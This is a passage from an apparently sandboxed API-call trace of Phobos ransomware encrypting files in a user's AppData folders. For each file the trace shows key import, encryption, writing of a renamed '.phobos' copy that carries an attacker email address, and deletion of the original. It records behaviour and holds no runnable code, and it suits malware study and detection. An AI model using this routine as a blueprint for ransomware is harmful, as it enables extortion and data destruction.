dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.986] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.986] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0165.987] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0165.987] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0165.988] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0165.988] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.988] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.988] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.988] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.988] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.988] CloseHandle (hObject=0x134) returned 1 [0165.988] CloseHandle (hObject=0x138) returned 1 [0165.988] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini")) returned 1 [0165.989] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.991] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0165.991] CloseHandle (hObject=0x138) returned 1 [0165.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini")) returned 0x2026 [0165.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.991] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.991] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.992] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.992] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.992] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0165.992] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0165.992] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0165.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0165.993] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.993] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.993] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.993] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.993] CryptDestroyKey (hKey=0xa32be8) returned 1 [0165.993] CloseHandle (hObject=0x138) returned 1 [0165.993] CloseHandle (hObject=0x134) returned 1 [0165.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini")) returned 1 [0165.994] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.995] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0165.995] CloseHandle (hObject=0x134) returned 1 [0165.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini")) returned 0x2026 [0165.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0165.995] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.995] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.996] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0165.996] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.996] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0166.001] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0166.001] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0166.001] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0166.001] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.001] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.002] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.002] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.002] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.002] CloseHandle (hObject=0x134) returned 1 [0166.002] CloseHandle (hObject=0x138) returned 1 [0166.002] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini")) returned 1 [0166.003] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0166.004] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0166.004] CloseHandle (hObject=0x138) returned 1 [0166.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat")) returned 0x2026 [0166.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0166.004] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.004] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.004] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0166.004] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.005] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8000, lpOverlapped=0x0) returned 1 [0166.145] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010, dwBufLen=0x8010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8010) returned 1 [0166.146] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8010, lpOverlapped=0x0) returned 1 [0166.147] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.147] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.147] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.147] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.147] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.147] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.147] CloseHandle (hObject=0x138) returned 1 [0166.147] CloseHandle (hObject=0x134) returned 1 [0166.147] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat")) returned 1 [0166.148] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.149] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=245980) returned 1 [0166.149] CloseHandle (hObject=0x134) returned 1 [0166.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat")) returned 0x2020 [0166.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.170] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.170] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0166.170] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.170] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3c0dc, lpOverlapped=0x0) returned 1 [0166.188] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3c0e0, dwBufLen=0x3c0e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3c0e0) returned 1 [0166.190] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3c0e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3c0e0, lpOverlapped=0x0) returned 1 [0166.194] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0166.194] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.194] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0166.196] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.196] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0166.196] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.196] CloseHandle (hObject=0x158) returned 1 [0166.196] CloseHandle (hObject=0x134) returned 1 [0166.196] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat")) returned 1 [0166.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.199] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12201) returned 1 [0166.199] CloseHandle (hObject=0x134) returned 1 [0166.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak")) returned 0x2020 [0166.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.199] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.199] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0166.199] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.199] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2fa9, lpOverlapped=0x0) returned 1 [0166.211] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2fb0, dwBufLen=0x2fb0 | out: pbData=0x34b0020*, 